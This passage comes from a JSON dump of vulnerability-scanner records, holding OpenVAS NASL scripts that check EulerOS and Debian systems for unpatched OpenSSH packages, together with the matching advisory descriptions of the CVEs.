rpm:\"openssh~7.4p1~11.el7\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"openssh-askpass\", rpm:\"openssh-askpass~7.4p1~11.el7\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"openssh-clients\", rpm:\"openssh-clients~7.4p1~11.el7\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"openssh-debuginfo\", rpm:\"openssh-debuginfo~7.4p1~11.el7\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"openssh-keycat\", rpm:\"openssh-keycat~7.4p1~11.el7\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"openssh-server\", rpm:\"openssh-server~7.4p1~11.el7\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2020-01-27T18:33:12", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-10011", "CVE-2016-10009"], "description": "The remote host is missing an update for the Huawei EulerOS\n ", "modified": "2020-01-23T00:00:00", "published": "2020-01-23T00:00:00", "id": "OPENVAS:1361412562311220171055", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562311220171055", "type": "openvas", "title": "Huawei EulerOS: Security Advisory for openssh (EulerOS-SA-2017-1055)", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.1.2.2017.1055\");\n script_version(\"2020-01-23T10:46:45+0000\");\n script_cve_id(\"CVE-2016-10009\", \"CVE-2016-10011\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2020-01-23 10:46:45 +0000 (Thu, 23 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-01-23 10:46:45 +0000 (Thu, 23 Jan 2020)\");\n script_name(\"Huawei EulerOS: Security Advisory for openssh (EulerOS-SA-2017-1055)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Huawei EulerOS Local Security Checks\");\n script_dependencies(\"gb_huawei_euleros_consolidation.nasl\");\n script_mandatory_keys(\"ssh/login/euleros\", \"ssh/login/rpms\", re:\"ssh/login/release=EULEROS-2\\.0SP1\");\n\n script_xref(name:\"EulerOS-SA\", value:\"2017-1055\");\n script_xref(name:\"URL\", value:\"https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2017-1055\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the Huawei EulerOS\n 'openssh' package(s) announced via the EulerOS-SA-2017-1055 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Untrusted search path vulnerability in ssh-agent.c in ssh-agent in OpenSSH before 7.4 allows remote attackers to execute arbitrary local PKCS#11 modules by leveraging control over a forwarded agent-socket.(CVE-2016-10009)\n\nauthfile.c in sshd in OpenSSH before 7.4 does not properly consider the effects of realloc on buffer contents, which might allow local users to obtain sensitive private-key information by leveraging access to a privilege-separated child process.(CVE-2016-10011)\");\n\n script_tag(name:\"affected\", value:\"'openssh' package(s) on Huawei EulerOS V2.0SP1.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"EULEROS-2.0SP1\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"openssh\", rpm:\"openssh~6.6.1p1~28.h7\", rls:\"EULEROS-2.0SP1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"openssh-askpass\", rpm:\"openssh-askpass~6.6.1p1~28.h7\", rls:\"EULEROS-2.0SP1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"openssh-clients\", rpm:\"openssh-clients~6.6.1p1~28.h7\", rls:\"EULEROS-2.0SP1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"openssh-keycat\", rpm:\"openssh-keycat~6.6.1p1~28.h7\", rls:\"EULEROS-2.0SP1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"openssh-server\", rpm:\"openssh-server~6.6.1p1~28.h7\", rls:\"EULEROS-2.0SP1\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-01-27T18:36:06", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-10011", "CVE-2016-10009"], "description": "The remote host is missing an update for the Huawei EulerOS\n ", "modified": "2020-01-23T00:00:00", "published": "2020-01-23T00:00:00", "id": "OPENVAS:1361412562311220171054", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562311220171054", "type": "openvas", "title": "Huawei EulerOS: Security Advisory for openssh (EulerOS-SA-2017-1054)", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.1.2.2017.1054\");\n script_version(\"2020-01-23T10:46:44+0000\");\n script_cve_id(\"CVE-2016-10009\", \"CVE-2016-10011\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2020-01-23 10:46:44 +0000 (Thu, 23 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-01-23 10:46:44 +0000 (Thu, 23 Jan 2020)\");\n script_name(\"Huawei EulerOS: Security Advisory for openssh (EulerOS-SA-2017-1054)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Huawei EulerOS Local Security Checks\");\n script_dependencies(\"gb_huawei_euleros_consolidation.nasl\");\n script_mandatory_keys(\"ssh/login/euleros\", \"ssh/login/rpms\", re:\"ssh/login/release=EULEROS-2\\.0SP2\");\n\n script_xref(name:\"EulerOS-SA\", value:\"2017-1054\");\n script_xref(name:\"URL\", value:\"https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2017-1054\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the Huawei EulerOS\n 'openssh' package(s) announced via the EulerOS-SA-2017-1054 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Untrusted search path vulnerability in ssh-agent.c in ssh-agent in OpenSSH before 7.4 allows remote attackers to execute arbitrary local PKCS#11 modules by leveraging control over a forwarded agent-socket.(CVE-2016-10009)\n\nauthfile.c in sshd in OpenSSH before 7.4 does not properly consider the effects of realloc on buffer contents, which might allow local users to obtain sensitive private-key information by leveraging access to a privilege-separated child process.(CVE-2016-10011)\");\n\n script_tag(name:\"affected\", value:\"'openssh' package(s) on Huawei EulerOS V2.0SP2.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"EULEROS-2.0SP2\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"openssh\", rpm:\"openssh~6.6.1p1~28.h7\", rls:\"EULEROS-2.0SP2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"openssh-askpass\", rpm:\"openssh-askpass~6.6.1p1~28.h7\", rls:\"EULEROS-2.0SP2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"openssh-clients\", rpm:\"openssh-clients~6.6.1p1~28.h7\", rls:\"EULEROS-2.0SP2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"openssh-keycat\", rpm:\"openssh-keycat~6.6.1p1~28.h7\", rls:\"EULEROS-2.0SP2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"openssh-server\", rpm:\"openssh-server~6.6.1p1~28.h7\", rls:\"EULEROS-2.0SP2\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-01-29T20:09:27", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-5600", "CVE-2016-1908", "CVE-2016-10708", "CVE-2016-10011", "CVE-2015-6564", "CVE-2016-10009", "CVE-2016-6515", "CVE-2015-5352", "CVE-2016-3115", "CVE-2017-15906", "CVE-2016-10012", "CVE-2015-6563"], "description": "Several vulnerabilities have been found in OpenSSH, a free implementation\nof the SSH protocol suite:\n\nCVE-2015-5352\n\nOpenSSH incorrectly verified time window deadlines for X connections.\nRemote attackers could take advantage of this flaw to bypass intended\naccess restrictions. Reported by Jann Horn.\n\nCVE-2015-5600\n\nOpenSSH improperly restricted the processing of keyboard-interactive\ndevices within a single connection, which could allow remote attackers\nto perform brute-force attacks or cause a denial of service, in a\nnon-default configuration.\n\nCVE-2015-6563\n\nOpenSSH incorrectly handled usernames during PAM authentication. In\nconjunction with an additional flaw in the OpenSSH unprivileged child\nprocess, remote attackers could make use if this issue to perform user\nimpersonation. Discovered by Moritz Jodeit.\n\nCVE-2015-6564\n\nMoritz Jodeit discovered a use-after-free flaw in PAM support in\nOpenSSH, that could be used by remote attackers to bypass\nauthentication or possibly execute arbitrary code.\n\nCVE-2016-1908\n\nOpenSSH mishandled untrusted X11 forwarding when the X server disables\nthe SECURITY extension. Untrusted connections could obtain trusted X11\nforwarding privileges. Reported by Thomas Hoger.\n\nCVE-2016-3115\n\nOpenSSH improperly handled X11 forwarding data related to\nauthentication credentials. Remote authenticated users could make use\nof this flaw to bypass intended shell-command restrictions. Identified\nby github.com/tintinweb.\n\nCVE-2016-6515\n\nOpenSSH did not limit password lengths for password authentication.\nRemote attackers could make use of this flaw to cause a denial of\nservice via long strings.\n\nCVE-2016-10009\n\nJann Horn discovered an untrusted search path vulnerability in\nssh-agent allowing remote attackers to execute arbitrary local\nPKCS#11 modules by leveraging control over a forwarded agent-socket.\n\nCVE-2016-10011\n\nJann Horn discovered that OpenSSH did not properly consider the\neffects of realloc on buffer contents. This may allow local users to\nobtain sensitive private-key information by leveraging access to a\nprivilege-separated child process.\n\nCVE-2016-10012\n\nGuido Vranken discovered that the OpenSSH shared memory manager\ndid not ensure that a bounds check was enforced by all compilers,\nwhich could allow local users to gain privileges by leveraging access\nto a sandboxed privilege-separation process.\n\nCVE-2016-10708\n\nNULL pointer dereference and daemon crash via an out-of-sequence\nNEWKEYS message.\n\nCVE-2017-15906\n\nMichal Zalewski reported that OpenSSH improperly prevent write\noperations in readonly mode, allowing attackers to create zero-length\nfiles.", "modified": "2020-01-29T00:00:00", "published": "2018-09-10T00:00:00", "id": "OPENVAS:1361412562310891500", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310891500", "type": "openvas", "title": "Debian LTS: Security Advisory for openssh (DLA-1500-1)", "sourceData": "# Copyright (C) 2018 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.891500\");\n script_version(\"2020-01-29T08:22:52+0000\");\n script_cve_id(\"CVE-2015-5352\", \"CVE-2015-5600\", \"CVE-2015-6563\", \"CVE-2015-6564\", \"CVE-2016-10009\",\n \"CVE-2016-10011\", \"CVE-2016-10012\", \"CVE-2016-10708\", \"CVE-2016-1908\", \"CVE-2016-3115\",\n \"CVE-2016-6515\", \"CVE-2017-15906\");\n script_name(\"Debian LTS: Security Advisory for openssh (DLA-1500-1)\");\n script_tag(name:\"last_modification\", value:\"2020-01-29 08:22:52 +0000 (Wed, 29 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2018-09-10 00:00:00 +0200 (Mon, 10 Sep 2018)\");\n script_tag(name:\"cvss_base\", value:\"8.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:C\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n script_xref(name:\"URL\", value:\"https://lists.debian.org/debian-lts-announce/2018/09/msg00010.html\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB8\");\n\n script_tag(name:\"affected\", value:\"openssh on Debian Linux\");\n\n script_tag(name:\"solution\", value:\"For Debian 8 'Jessie', these problems have been fixed in version\n1:6.7p1-5+deb8u6.\n\nWe recommend that you upgrade your openssh packages.\");\n\n script_tag(name:\"summary\", value:\"Several vulnerabilities have been found in OpenSSH, a free implementation\nof the SSH protocol suite:\n\nCVE-2015-5352\n\nOpenSSH incorrectly verified time window deadlines for X connections.\nRemote attackers could take advantage of this flaw to bypass intended\naccess restrictions. Reported by Jann Horn.\n\nCVE-2015-5600\n\nOpenSSH improperly restricted the processing of keyboard-interactive\ndevices within a single connection, which could allow remote attackers\nto perform brute-force attacks or cause a denial of service, in a\nnon-default configuration.\n\nCVE-2015-6563\n\nOpenSSH incorrectly handled usernames during PAM authentication. In\nconjunction with an additional flaw in the OpenSSH unprivileged child\nprocess, remote attackers could make use if this issue to perform user\nimpersonation. Discovered by Moritz Jodeit.\n\nCVE-2015-6564\n\nMoritz Jodeit discovered a use-after-free flaw in PAM support in\nOpenSSH, that could be used by remote attackers to bypass\nauthentication or possibly execute arbitrary code.\n\nCVE-2016-1908\n\nOpenSSH mishandled untrusted X11 forwarding when the X server disables\nthe SECURITY extension. Untrusted connections could obtain trusted X11\nforwarding privileges. Reported by Thomas Hoger.\n\nCVE-2016-3115\n\nOpenSSH improperly handled X11 forwarding data related to\nauthentication credentials. Remote authenticated users could make use\nof this flaw to bypass intended shell-command restrictions. Identified\nby github.com/tintinweb.\n\nCVE-2016-6515\n\nOpenSSH did not limit password lengths for password authentication.\nRemote attackers could make use of this flaw to cause a denial of\nservice via long strings.\n\nCVE-2016-10009\n\nJann Horn discovered an untrusted search path vulnerability in\nssh-agent allowing remote attackers to execute arbitrary local\nPKCS#11 modules by leveraging control over a forwarded agent-socket.\n\nCVE-2016-10011\n\nJann Horn discovered that OpenSSH did not properly consider the\neffects of realloc on buffer contents. This may allow local users to\nobtain sensitive private-key information by leveraging access to a\nprivilege-separated child process.\n\nCVE-2016-10012\n\nGuido Vranken discovered that the OpenSSH shared memory manager\ndid not ensure that a bounds check was enforced by all compilers,\nwhich could allow local users to gain privileges by leveraging access\nto a sandboxed privilege-separation process.\n\nCVE-2016-10708\n\nNULL pointer dereference and daemon crash via an out-of-sequence\nNEWKEYS message.\n\nCVE-2017-15906\n\nMichal Zalewski reported that OpenSSH improperly prevent write\noperations in readonly mode, allowing attackers to create zero-length\nfiles.\");\n\n script_tag(name:\"vuldetect\", value:\"This check tests the installed software version using the apt package manager.\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif(!isnull(res = isdpkgvuln(pkg:\"openssh-client\", ver:\"1:6.7p1-5+deb8u6\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"openssh-server\", ver:\"1:6.7p1-5+deb8u6\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"openssh-sftp-server\", ver:\"1:6.7p1-5+deb8u6\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"ssh\", ver:\"1:6.7p1-5+deb8u6\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"ssh-askpass-gnome\", ver:\"1:6.7p1-5+deb8u6\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"ssh-krb5\", ver:\"1:6.7p1-5+deb8u6\", rls:\"DEB8\"))) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if(__pkg_match) {\n exit(99);\n}\n", "cvss": {"score": 8.5, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:C"}}, {"lastseen": "2020-01-27T18:33:30", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-10708"], "description": "The remote host is missing an update for the Huawei EulerOS\n ", "modified": "2020-01-23T00:00:00", "published": "2020-01-23T00:00:00", "id": "OPENVAS:1361412562311220181254", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562311220181254", "type": "openvas", "title": "Huawei EulerOS: Security Advisory for openssh (EulerOS-SA-2018-1254)", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.1.2.2018.1254\");\n script_version(\"2020-01-23T11:19:05+0000\");\n script_cve_id(\"CVE-2016-10708\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_tag(name:\"last_modification\", value:\"2020-01-23 11:19:05 +0000 (Thu, 23 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-01-23 11:19:05 +0000 (Thu, 23 Jan 2020)\");\n script_name(\"Huawei EulerOS: Security Advisory for openssh (EulerOS-SA-2018-1254)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Huawei EulerOS Local Security Checks\");\n script_dependencies(\"gb_huawei_euleros_consolidation.nasl\");\n script_mandatory_keys(\"ssh/login/euleros\", \"ssh/login/rpms\", re:\"ssh/login/release=EULEROSVIRT-2\\.5\\.0\");\n\n script_xref(name:\"EulerOS-SA\", value:\"2018-1254\");\n script_xref(name:\"URL\", value:\"https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2018-1254\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the Huawei EulerOS\n 'openssh' package(s) announced via the EulerOS-SA-2018-1254 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"sshd in OpenSSH before 7.4 allows remote attackers to cause a denial of service (NULL pointer dereference and daemon crash) via an out-of-sequence NEWKEYS message, as demonstrated by Honggfuzz, related to kex.c and packet.c.(CVE-2016-10708)\");\n\n script_tag(name:\"affected\", value:\"'openssh' package(s) on Huawei EulerOS Virtualization 2.5.0.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"EULEROSVIRT-2.5.0\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"openssh\", rpm:\"openssh~6.6.1p1~25.4.h6\", rls:\"EULEROSVIRT-2.5.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"openssh-clients\", rpm:\"openssh-clients~6.6.1p1~25.4.h6\", rls:\"EULEROSVIRT-2.5.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"openssh-keycat\", rpm:\"openssh-keycat~6.6.1p1~25.4.h6\", rls:\"EULEROSVIRT-2.5.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"openssh-server\", rpm:\"openssh-server~6.6.1p1~25.4.h6\", rls:\"EULEROSVIRT-2.5.0\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2020-01-29T20:09:13", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-10708"], "description": "OpenSSH was found to be vulnerable to out of order NEWKEYS messages\nwhich could crash the daemon, resulting in a denial of service attack.", "modified": "2020-01-29T00:00:00", "published": "2018-01-31T00:00:00", "id": "OPENVAS:1361412562310891257", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310891257", "type": "openvas", "title": "Debian LTS: Security Advisory for openssh (DLA-1257-1)", "sourceData": "# Copyright (C) 2018 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.891257\");\n script_version(\"2020-01-29T08:22:52+0000\");\n script_cve_id(\"CVE-2016-10708\");\n script_name(\"Debian LTS: Security Advisory for openssh (DLA-1257-1)\");\n script_tag(name:\"last_modification\", value:\"2020-01-29 08:22:52 +0000 (Wed, 29 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2018-01-31 00:00:00 +0100 (Wed, 31 Jan 2018)\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n script_xref(name:\"URL\", value:\"https://lists.debian.org/debian-lts-announce/2018/01/msg00031.html\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB7\");\n\n script_tag(name:\"affected\", value:\"openssh on Debian Linux\");\n\n script_tag(name:\"solution\", value:\"For Debian 7 'Wheezy', these problems have been fixed in version\n1:6.0p1-4+deb7u7.\n\nWe recommend that you upgrade your openssh packages.\");\n\n script_tag(name:\"summary\", value:\"OpenSSH was found to be vulnerable to out of order NEWKEYS messages\nwhich could crash the daemon, resulting in a denial of service attack.\");\n\n script_tag(name:\"vuldetect\", value:\"This check tests the installed software version using the apt package manager.\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif(!isnull(res = isdpkgvuln(pkg:\"openssh-client\", ver:\"1:6.0p1-4+deb7u7\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"openssh-server\", ver:\"1:6.0p1-4+deb7u7\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"ssh\", ver:\"1:6.0p1-4+deb7u7\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"ssh-askpass-gnome\", ver:\"1:6.0p1-4+deb7u7\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"ssh-krb5\", ver:\"1:6.0p1-4+deb7u7\", rls:\"DEB7\"))) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if(__pkg_match) {\n exit(99);\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2020-01-27T18:39:52", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-10708"], "description": "The remote host is missing an update for the Huawei EulerOS\n ", "modified": "2020-01-23T00:00:00", "published": "2020-01-23T00:00:00", "id": "OPENVAS:1361412562311220181069", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562311220181069", "type": "openvas", "title": "Huawei EulerOS: Security Advisory for openssh (EulerOS-SA-2018-1069)", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.1.2.2018.1069\");\n script_version(\"2020-01-23T11:11:39+0000\");\n script_cve_id(\"CVE-2016-10708\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_tag(name:\"last_modification\", value:\"2020-01-23 11:11:39 +0000 (Thu, 23 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-01-23 11:11:39 +0000 